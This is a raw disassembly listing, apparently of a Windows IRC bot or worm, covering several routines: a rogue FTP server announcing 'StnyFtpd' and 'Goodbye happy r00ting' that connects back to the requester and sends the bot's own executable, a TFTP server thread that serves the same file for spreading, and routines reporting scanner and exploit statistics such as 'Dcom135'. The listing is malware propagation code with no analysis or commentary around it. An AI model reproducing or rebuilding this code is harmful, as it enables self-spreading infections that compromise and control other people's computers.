loc_403FEE: ; CODE XREF: sub_403C1E+3A5�j
mov eax, [ebp+var_104]
dec eax
mov [ebp+var_104], eax
jmp short loc_403FFF
; ---------------------------------------------------------------------------
loc_403FFD: ; CODE XREF: sub_403C1E+396�j
jmp short loc_403F86
; ---------------------------------------------------------------------------
loc_403FFF: ; CODE XREF: sub_403C1E+381�j
; sub_403C1E+3DD�j
xor eax, eax
test eax, eax
jnz loc_403F7D
push [ebp+fd] ; s
call ds:closesocket ; closesocket
jmp loc_404485
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403C1E+359�j
lea eax, [ebp+var_38C]
push eax
lea eax, [ebp+Str1]
push eax
push offset aSS_1 ; "%s %s"
lea eax, [ebp+Dst]
push eax ; Src
call _sscanf
add esp, 10h
push offset Str2 ; "USER"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40406D
push 0 ; flags
push 16h ; len
push offset a331PasswordReq ; "331 Password required\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_40406D: ; CODE XREF: sub_403C1E+433�j
push offset aPass ; "PASS"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40409E
push 0 ; flags
push 14h ; len
push offset a230UserLoggedI ; "230 User logged in.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_40409E: ; CODE XREF: sub_403C1E+464�j
push offset aSyst ; "SYST"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4040CF
push 0 ; flags
push 0Dh ; len
push offset a215Stnyftpd ; "215 StnyFtpd\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_4040CF: ; CODE XREF: sub_403C1E+495�j
push offset aRest ; "REST"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404100
push 0 ; flags
push 10h ; len
push offset a350Restarting_ ; "350 Restarting.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404100: ; CODE XREF: sub_403C1E+4C6�j
push offset off_41EAD4 ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404131
push 0 ; flags
push 1Eh ; len
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404131: ; CODE XREF: sub_403C1E+4F7�j
push offset aType ; "TYPE"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404179
push offset aA ; "A"
lea eax, [ebp+var_38C]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404179
push 0 ; flags
push 13h ; len
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404179: ; CODE XREF: sub_403C1E+528�j
; sub_403C1E+53F�j
push offset aType_0 ; "TYPE"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4041C1
push offset aI ; "I"
lea eax, [ebp+var_38C]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4041C1
push 0 ; flags
push 13h ; len
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_4041C1: ; CODE XREF: sub_403C1E+570�j
; sub_403C1E+587�j
push offset aPasv ; "PASV"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404212
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+Str]
rep movsd
movsw
push 0 ; flags
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax ; len
lea eax, [ebp+Str]
push eax ; buf
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404212: ; CODE XREF: sub_403C1E+5B8�j
push offset aList ; "LIST"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404264
push 5
pop ecx
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+var_A90]
rep movsd
movsw
movsb
push 0 ; flags
lea eax, [ebp+var_A90]
push eax ; Str
call _strlen
pop ecx
push eax ; len
lea eax, [ebp+var_A90]
push eax ; buf
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404264: ; CODE XREF: sub_403C1E+609�j
push offset aPort ; "PORT"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_404379
lea eax, [ebp+var_6B0]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_310]
push eax
lea eax, [ebp+var_174]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_108]
push eax
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
lea eax, [ebp+Dst]
push eax ; Src
call _sscanf
add esp, 20h
lea eax, [ebp+Dest]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_328], eax
lea eax, [ebp+var_6B0]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_A3C], eax
push 32h ; Size
push 0 ; Val
lea eax, [ebp+Dest]
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+var_A3C]
push [ebp+var_328]
push offset aXX ; "%x%x\n"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
push 10h ; Radix
push 0 ; EndPtr
lea eax, [ebp+Dest]
push eax ; Str
call _strtoul
add esp, 0Ch
mov dword ptr [ebp+hostshort], eax
lea eax, [ebp+var_310]
push eax
lea eax, [ebp+var_174]
push eax
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_108]
push eax
push offset aS_S_S_S ; "%s.%s.%s.%s"
lea eax, [ebp+cp]
push eax ; Dest
call _sprintf
add esp, 18h
push 0 ; flags
push 1Dh ; len
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+fd] ; s
call ds:send ; send
jmp loc_404472
; ---------------------------------------------------------------------------
loc_404379: ; CODE XREF: sub_403C1E+65B�j
push offset aRetr ; "RETR"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_404446
push 0 ; flags
push 28h ; len
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+fd] ; s
call ds:send ; send
push dword ptr [ebp+hostshort] ; hostshort
lea eax, [ebp+cp]
push eax ; cp
call sub_404498
pop ecx
pop ecx
cmp eax, 1
jnz short loc_40442F
call sub_404515
cmp eax, 1
jnz short loc_40442D
push 0 ; flags
push 17h ; len
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+fd] ; s
call ds:send ; send
lea eax, [ebp+cp]
push eax
push offset aFtpFileTransfe ; "FTP File transfer complete: %s"
lea eax, [ebp+var_A34]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_3E4]
lea eax, [ebp+var_A34]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+var_67C]
call sub_40A08D
add esp, 14h
lea eax, [ebp+var_A34]
push eax
call sub_40913D
pop ecx
loc_40442D: ; CODE XREF: sub_403C1E+7AC�j
jmp short loc_404444
; ---------------------------------------------------------------------------
loc_40442F: ; CODE XREF: sub_403C1E+7A2�j
push 0 ; flags
push 20h ; len
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
push [ebp+fd] ; s
call ds:send ; send
loc_404444: ; CODE XREF: sub_403C1E:loc_40442D�j
jmp short loc_404472
; ---------------------------------------------------------------------------
loc_404446: ; CODE XREF: sub_403C1E+770�j
push offset aQuit ; "QUIT"
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_404472
push 0 ; flags
push 1Bh ; len
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
push [ebp+fd] ; s
call ds:send ; send
loc_404472: ; CODE XREF: sub_403C1E+44A�j
; sub_403C1E+47B�j ...
push 64h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
loc_404485: ; CODE XREF: sub_403C1E+238�j
; sub_403C1E:loc_403F4E�j ...
jmp loc_403DFD
; ---------------------------------------------------------------------------
loc_40448A: ; CODE XREF: sub_403C1E+1F8�j
jmp loc_403DB0
; ---------------------------------------------------------------------------
loc_40448F: ; CODE XREF: sub_403C1E+197�j
push 1
pop eax
loc_404492: ; CODE XREF: sub_403C1E+F9�j
; sub_403C1E+1D1�j
pop edi
pop esi
leave
retn 4
sub_403C1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_404498(char *cp, u_short hostshort)
sub_404498 proc near ; CODE XREF: sub_403C1E+798�p
WSAData = WSAData ptr -1A0h
name = sockaddr ptr -10h
cp = dword ptr 8
hostshort = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov s, eax
mov [ebp+name.sa_family], 2
push [ebp+cp] ; cp
call ds:inet_addr ; inet_addr
mov dword ptr [ebp+name.sa_data+2], eax
push dword ptr [ebp+hostshort] ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
push s ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_404510
push s ; s
call ds:closesocket ; closesocket
call ds:WSACleanup ; WSACleanup
xor eax, eax
jmp short locret_404513
; ---------------------------------------------------------------------------
loc_404510: ; CODE XREF: sub_404498+60�j
push 1
pop eax
locret_404513: ; CODE XREF: sub_404498+76�j
leave
retn
sub_404498 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404515 proc near ; CODE XREF: sub_403C1E+7A4�p
var_1118 = dword ptr -1118h
var_1114 = dword ptr -1114h
var_1110 = dword ptr -1110h
File = dword ptr -110Ch
Filename = byte ptr -1108h
len = dword ptr -1004h
Dst = byte ptr -1000h
push ebp
mov ebp, esp
mov eax, 1118h
call __alloca_probe
and [ebp+File], 0
mov [ebp+len], 1000h
push 104h ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push 0 ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
push offset Mode ; "rb"
lea eax, [ebp+Filename]
push eax ; Filename
call _fopen
pop ecx
pop ecx
mov [ebp+File], eax
cmp [ebp+File], 0
jz loc_404669
push 2 ; Origin
push 0 ; Offset
push [ebp+File] ; File
call _fseek
add esp, 0Ch
push [ebp+File] ; File
call _ftell
pop ecx
mov [ebp+var_1114], eax
push 0 ; Origin
push 0 ; Offset
push [ebp+File] ; File
call _fseek
add esp, 0Ch
and [ebp+var_1110], 0
loc_4045AA: ; CODE XREF: sub_404515:loc_404664�j
mov eax, [ebp+File]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz loc_404669
and [ebp+var_1110], 0
push 1000h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+File] ; File
push 800h ; Count
push 1 ; ElementSize
lea eax, [ebp+Dst]
push eax ; DstBuf
call _fread
add esp, 10h
mov [ebp+len], eax
mov eax, [ebp+File]
mov eax, [eax+0Ch]
and eax, 20h
test eax, eax
jz short loc_40460F
jmp short loc_404669
; ---------------------------------------------------------------------------
loc_40460F: ; CODE XREF: sub_404515+F6�j
; sub_404515+14D�j
mov eax, [ebp+var_1110]
cmp eax, [ebp+len]
jge short loc_404664
push 0 ; flags
push [ebp+len] ; len
lea eax, [ebp+Dst]
push eax ; buf
push s ; s
call ds:send ; send
mov [ebp+var_1118], eax
or [ebp+var_1118], 0FFFFFFFFh
cmp [ebp+var_1118], 0
jz short loc_404650
jmp short loc_404664
; ---------------------------------------------------------------------------
loc_404650: ; CODE XREF: sub_404515+137�j
mov eax, [ebp+var_1110]
add eax, [ebp+var_1118]
mov [ebp+var_1110], eax
jmp short loc_40460F
; ---------------------------------------------------------------------------
loc_404664: ; CODE XREF: sub_404515+106�j
; sub_404515+139�j
jmp loc_4045AA
; ---------------------------------------------------------------------------
loc_404669: ; CODE XREF: sub_404515+52�j
; sub_404515+A3�j ...
push [ebp+File] ; File
call _fclose
pop ecx
push s ; s
call ds:closesocket ; closesocket
call ds:WSACleanup ; WSACleanup
push 1
pop eax
leave
retn
sub_404515 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; CODE XREF: StartAddress+15F�p
; StartAddress+700�p
; DATA XREF: ...
var_89C = byte ptr -89Ch
var_898 = dword ptr -898h
var_894 = byte ptr -894h
var_890 = dword ptr -890h
Str2 = dword ptr -88Ch
var_888 = dword ptr -888h
var_884 = byte ptr -884h
var_880 = dword ptr -880h
var_874 = byte ptr -874h
var_873 = byte ptr -873h
var_872 = byte ptr -872h
var_871 = byte ptr -871h
DstBuf = byte ptr -870h
var_670 = dword ptr -670h
var_66C = dword ptr -66Ch
var_668 = dword ptr -668h
var_664 = dword ptr -664h
var_660 = dword ptr -660h
File = dword ptr -560h
Dst = word ptr -55Ch
var_55A = word ptr -55Ah
var_558 = dword ptr -558h
Dest = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_34B = byte ptr -34Bh
var_34A = byte ptr -34Ah
var_349 = byte ptr -349h
var_2CC = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_2C4 = byte ptr -2C4h
var_2B0 = dword ptr -2B0h
Filename = byte ptr -2ACh
Str1 = byte ptr -1A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9A = byte ptr -9Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 89Ch
push esi
push edi
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_C]
movsd
movsw
mov [ebp+var_4], 1
mov esi, [ebp+arg_0]
mov ecx, 0A9h
lea edi, [ebp+var_2B0]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_2CC], eax
mov eax, [ebp+var_2CC]
mov dword ptr [eax+2A0h], 1
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
push 0
push 2
push 2
call dword_4264A0 ; socket
mov [ebp+var_2C8], eax
cmp [ebp+var_2C8], 0FFFFFFFFh
jnz short loc_404768
push 190h ; dwMilliseconds
call ds:Sleep ; Sleep
call dword_4263C8 ; WSAGetLastError
push eax
push offset aTftpdErrorSock ; "-TFTPD- Error: socket() failed, returne"...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_14], 0
jnz short loc_404747
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_9A]
push eax
push [ebp+var_2B0]
call sub_40A08D
add esp, 14h
loc_404747: ; CODE XREF: StartAddress+98�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_A4]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_404768: ; CODE XREF: StartAddress+6C�j
mov eax, [ebp+var_A4]
imul eax, 234h
mov ecx, [ebp+var_2C8]
mov dword_42B54C[eax], ecx
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push dword ptr [ebp-9Ch]
call dword_426424 ; ntohs
mov [ebp+var_55A], ax
and [ebp+var_558], 0
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+var_2C8]
call dword_426450 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047F5
push 1388h ; dwMilliseconds
call ds:Sleep ; Sleep
mov eax, [ebp+var_A0]
dec eax
mov [ebp+var_A0], eax
push [ebp+arg_0] ; LPVOID
call StartAddress
jmp loc_404D91
; ---------------------------------------------------------------------------
loc_4047F5: ; CODE XREF: StartAddress+142�j
push offset aRb_0 ; "rb"
lea eax, [ebp+Filename]
push eax ; Filename
call _fopen
pop ecx
pop ecx
mov [ebp+File], eax
cmp [ebp+File], 0
jnz short loc_40487F
push 190h ; dwMilliseconds
call ds:Sleep ; Sleep
lea eax, [ebp+Filename]
push eax
push offset aTftpdFailedToO ; "-TFTPD- Failed to open file: %s."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_9A]
push eax
push [ebp+var_2B0]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_A4]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40487F: ; CODE XREF: StartAddress+189�j
; StartAddress:loc_404D2C�j ...
cmp [ebp+var_4], 0
jle loc_404D36
mov eax, [ebp+var_2CC]
cmp dword ptr [eax+2A0h], 0
jz loc_404D36
cmp [ebp+File], 0
jz loc_404D36
mov [ebp+var_66C], 5
mov [ebp+var_668], 1388h
and [ebp+var_664], 0
loc_4048C4: ; CODE XREF: StartAddress+2B0�j
and [ebp+var_670], 0
jmp short loc_4048DA
; ---------------------------------------------------------------------------
loc_4048CD: ; CODE XREF: StartAddress:loc_4048FF�j
mov eax, [ebp+var_670]
inc eax
mov [ebp+var_670], eax
loc_4048DA: ; CODE XREF: StartAddress+23F�j
mov eax, [ebp+var_670]
cmp eax, [ebp+var_664]
jnb short loc_404901
mov eax, [ebp+var_670]
mov eax, [ebp+eax*4+var_660]
cmp eax, [ebp+var_2C8]
jnz short loc_4048FF
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FF: ; CODE XREF: StartAddress+26F�j
jmp short loc_4048CD
; ---------------------------------------------------------------------------
loc_404901: ; CODE XREF: StartAddress+25A�j
; StartAddress+271�j
mov eax, [ebp+var_670]
cmp eax, [ebp+var_664]
jnz short loc_404938
cmp [ebp+var_664], 40h
jnb short loc_404938
mov eax, [ebp+var_670]
mov ecx, [ebp+var_2C8]
mov [ebp+eax*4+var_660], ecx
mov eax, [ebp+var_664]
inc eax
mov [ebp+var_664], eax
loc_404938: ; CODE XREF: StartAddress+281�j
; StartAddress+28A�j
xor eax, eax
test eax, eax
jnz short loc_4048C4
push 80h ; Size
push 0 ; Val
lea eax, [ebp+var_34C]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_66C]
push eax
push 0
push 0
lea eax, [ebp+var_664]
push eax
push 0
call dword_426410 ; select
test eax, eax
jle loc_404D2C
mov [ebp+var_888], 10h
mov al, byte_4249F8
mov [ebp+var_874], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_873]
rep stosd
stosw
stosb
lea eax, [ebp+var_888]
push eax
lea eax, [ebp+var_884]
push eax
push 0
push 80h
lea eax, [ebp+var_34C]
push eax
push [ebp+var_2C8]
call dword_426400 ; recvfrom
mov [ebp+var_4], eax
push [ebp+var_880]
call dword_4264AC ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_2C4]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
movsx eax, [ebp+var_34C]
test eax, eax
jnz loc_404B92
movsx eax, [ebp+var_34B]
cmp eax, 1
jnz loc_404B92
lea eax, [ebp+var_34C]
mov [ebp+Str2], eax
lea eax, [ebp+var_34C]
mov [ebp+var_890], eax
mov eax, [ebp+Str2]
inc eax
inc eax
mov [ebp+Str2], eax
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
pop ecx
mov ecx, [ebp+var_890]
lea eax, [ecx+eax+3]
mov [ebp+var_890], eax
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
pop ecx
push eax ; MaxCount
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404A8D
lea eax, [ebp+var_C]
push eax ; Str
call _strlen
pop ecx
push eax ; MaxCount
push [ebp+var_890] ; Str2
lea eax, [ebp+var_C]
push eax ; Str1
call _strncmp
add esp, 0Ch
test eax, eax
jz short loc_404AE3
loc_404A8D: ; CODE XREF: StartAddress+3DE�j
push [ebp+var_888]
lea eax, [ebp+var_884]
push eax
push 0
push 13h
push offset dword_41ED08
push [ebp+var_2C8]
call dword_426484 ; sendto
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_2C4]
push eax
push offset aTftpdFileNotFo ; "-TFTPD- File not found: %s (%s)."
lea eax, [ebp+var_34C]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_34C]
push eax
call sub_40913D
pop ecx
jmp loc_404B8D
; ---------------------------------------------------------------------------
loc_404AE3: ; CODE XREF: StartAddress+3FF�j
push 0 ; Origin
push 0 ; Offset
push [ebp+File] ; File
call _fseek
add esp, 0Ch
and [ebp+var_874], 0
mov [ebp+var_873], 3
and [ebp+var_872], 0
mov [ebp+var_871], 1
push [ebp+File] ; File
push 200h ; Count
push 1 ; ElementSize
lea eax, [ebp+DstBuf]
push eax ; DstBuf
call _fread
add esp, 10h
mov [ebp+var_4], eax
push [ebp+var_888]
lea eax, [ebp+var_884]
push eax
push 0
mov eax, [ebp+var_4]
add eax, 4
push eax
lea eax, [ebp+var_874]
push eax
push [ebp+var_2C8]
call dword_426484 ; sendto
cmp [ebp+var_14], 0
jnz short loc_404B80
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_9A]
push eax
push [ebp+var_2B0]
call sub_40A08D
add esp, 14h
loc_404B80: ; CODE XREF: StartAddress+4D1�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
loc_404B8D: ; CODE XREF: StartAddress+452�j
jmp loc_404D2A
; ---------------------------------------------------------------------------
loc_404B92: ; CODE XREF: StartAddress+360�j
; StartAddress+370�j
movsx eax, [ebp+var_34C]
test eax, eax
jnz loc_404D08
movsx eax, [ebp+var_34B]
cmp eax, 4
jnz loc_404D08
mov al, [ebp+var_34A]
mov [ebp+var_89C], al
mov al, [ebp+var_349]
mov [ebp+var_894], al
and [ebp+var_874], 0
mov [ebp+var_873], 3
movzx eax, [ebp+var_894]
cmp eax, 0FFh
jnz short loc_404C14
mov al, [ebp+var_89C]
add al, 1
mov [ebp+var_89C], al
mov al, [ebp+var_89C]
mov [ebp+var_872], al
and [ebp+var_894], 0
mov al, [ebp+var_894]
mov [ebp+var_871], al
jmp short loc_404C3A
; ---------------------------------------------------------------------------
loc_404C14: ; CODE XREF: StartAddress+557�j
mov al, [ebp+var_89C]
mov [ebp+var_872], al
mov al, [ebp+var_894]
add al, 1
mov [ebp+var_894], al
mov al, [ebp+var_894]
mov [ebp+var_871], al
loc_404C3A: ; CODE XREF: StartAddress+586�j
movzx eax, [ebp+var_89C]
shl eax, 8
movzx ecx, [ebp+var_894]
lea eax, [eax+ecx-1]
mov [ebp+var_898], eax
push 0 ; Origin
mov eax, [ebp+var_898]
shl eax, 9
push eax ; Offset
push [ebp+File] ; File
call _fseek
add esp, 0Ch
push [ebp+File] ; File
push 200h ; Count
push 1 ; ElementSize
lea eax, [ebp+DstBuf]
push eax ; DstBuf
call _fread
add esp, 10h
mov [ebp+var_4], eax
push [ebp+var_888]
lea eax, [ebp+var_884]
push eax
push 0
mov eax, [ebp+var_4]
add eax, 4
push eax
lea eax, [ebp+var_874]
push eax
push [ebp+var_2C8]
call dword_426484 ; sendto
cmp [ebp+var_4], 0
jnz short loc_404D06
lea eax, [ebp+var_2C4]
push eax
push offset aTftpFileTransf ; "TFTP File transfer complete: %s"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_18]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_9A]
push eax
push [ebp+var_2B0]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
loc_404D06: ; CODE XREF: StartAddress+62F�j
jmp short loc_404D2A
; ---------------------------------------------------------------------------
loc_404D08: ; CODE XREF: StartAddress+50F�j
; StartAddress+51F�j
push [ebp+var_888]
lea eax, [ebp+var_884]
push eax
push 0
push 9
push offset dword_41ED60
push [ebp+var_2C8]
call dword_426484 ; sendto
loc_404D2A: ; CODE XREF: StartAddress:loc_404B8D�j
; StartAddress:loc_404D06�j
jmp short loc_404D31
; ---------------------------------------------------------------------------
loc_404D2C: ; CODE XREF: StartAddress+2E4�j
jmp loc_40487F
; ---------------------------------------------------------------------------
loc_404D31: ; CODE XREF: StartAddress:loc_404D2A�j
jmp loc_40487F
; ---------------------------------------------------------------------------
loc_404D36: ; CODE XREF: StartAddress+1F7�j
; StartAddress+20A�j ...
push [ebp+var_2C8]
call dword_4264B8 ; closesocket
push [ebp+File] ; File
call _fclose
pop ecx
mov eax, [ebp+var_A0]
dec eax
mov [ebp+var_A0], eax
mov eax, [ebp+var_2CC]
cmp dword ptr [eax+2A0h], 0
jnz short loc_404D7E
push [ebp+var_A4]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_404D7E: ; CODE XREF: StartAddress+6DC�j
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
push [ebp+arg_0] ; LPVOID
call StartAddress
loc_404D91: ; CODE XREF: StartAddress+164�j
pop edi
pop esi
leave
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D97 proc near ; CODE XREF: sub_40ABFE+1A55�p
var_408 = dword ptr -408h
Dest = byte ptr -404h
var_204 = dword ptr -204h
Source = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 408h
and [ebp+var_408], 0
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_404DD0
; ---------------------------------------------------------------------------
loc_404DC3: ; CODE XREF: sub_404D97+B3�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_404DD0: ; CODE XREF: sub_404D97+2A�j
mov eax, [ebp+var_204]
imul eax, 3Ch
cmp dword_41ED98[eax], 0
jz short loc_404E4F
mov eax, [ebp+var_204]
imul eax, 3Ch
mov ecx, [ebp+var_408]
add ecx, dword_41EDA0[eax]
mov [ebp+var_408], ecx
mov eax, [ebp+var_204]
imul eax, 3Ch
push dword_41EDA0[eax]
mov eax, [ebp+var_204]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSD ; " %s: %d,"
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
add esp, 10h
push 200h ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 0Ch
jmp loc_404DC3
; ---------------------------------------------------------------------------
loc_404E4F: ; CODE XREF: sub_404D97+49�j
push [ebp+var_408]
push offset aTotalD ; " Total: %d"
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 200h ; Count
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strncat
add esp, 0Ch
push 0
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
leave
retn
sub_404D97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EAD proc near ; CODE XREF: sub_40ABFE+2873�p
var_204 = dword ptr -204h
Dest = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 204h
push 8
call sub_4105E0
pop ecx
test eax, eax
jle short loc_404EF5
mov eax, [ebp+arg_C]
mov eax, dword_424A00[eax*8]
mov [ebp+var_204], eax
push [ebp+var_204]
call dword_4264AC ; inet_ntoa
push eax
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_404F08
; ---------------------------------------------------------------------------
loc_404EF5: ; CODE XREF: sub_404EAD+13�j
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_404F08: ; CODE XREF: sub_404EAD+46�j
push 0
push [ebp+arg_8]
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
leave
retn
sub_404EAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
